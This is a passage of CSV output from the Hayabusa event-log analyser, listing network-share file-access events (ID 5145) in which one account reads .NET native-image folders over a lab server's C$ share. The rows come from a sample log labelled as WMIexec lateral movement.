+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#\3dde15282321aa41c609dc7f7a5f1af5 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#\61d489d8a768782ce394f299dcc0e4bb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#\f2c2cff3fa34c990079298396b1ec1fc : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\4b7763786015950c44dbba0ff26b883e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#\af89139de3b87146c705fa989eeaa4b1 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#\db42d61826797328b8b368348c6b3f13 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#\9de316f43fe18621a13deefe7dbbbc27 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.078 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#\5a669ebdf74fb2c8f0d8148b4f79b9a2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#\81722d79b43d0329413516f10c3faf60 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#\cd0ef620fc82b9dab224ae428bb2a910 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity\0023a84796c78827e3d0176900ba5b59 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile\84ecb78e3635883e1cf8acae1dec527e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing\aa9b0e256833bf2671e6cb5370559f4f : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services\fe0f1499df5082fd5392827ddfb03c9e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#\1235ba87f20536f0d0826b2ed514ab19 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#\928d9b9947cc9afb702c0c2fe2945da7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#\55235c007590785b8554cd0c0dc95d36 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#\ee04d39ed856041bef2381a968f3c2b9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#\cf3e7fb699d07208e389d8d3e5c3e3b4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\635558b506364815e8348217e86fdf99 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#\b8d89e2f35d492e69789bd504270dff4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#\2af2b08e949ae5ebe946684d477a50d5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#\e75ae269d8eb8c8fb7bdcce4082ff8c2 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#\64d113caa8b81caec5c21797931b5624 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\10483ca149b5c651d217edbf2f3169b4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting\e9062794b3050c9564584baa07300c10 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\77bc1a994f64193efc124c297b93fdb7 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#\1e30da61ac8d97f7b17cdce57fb6a874 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\6f7a4225a199ad7894379512ca6ae50c : IP Address: 
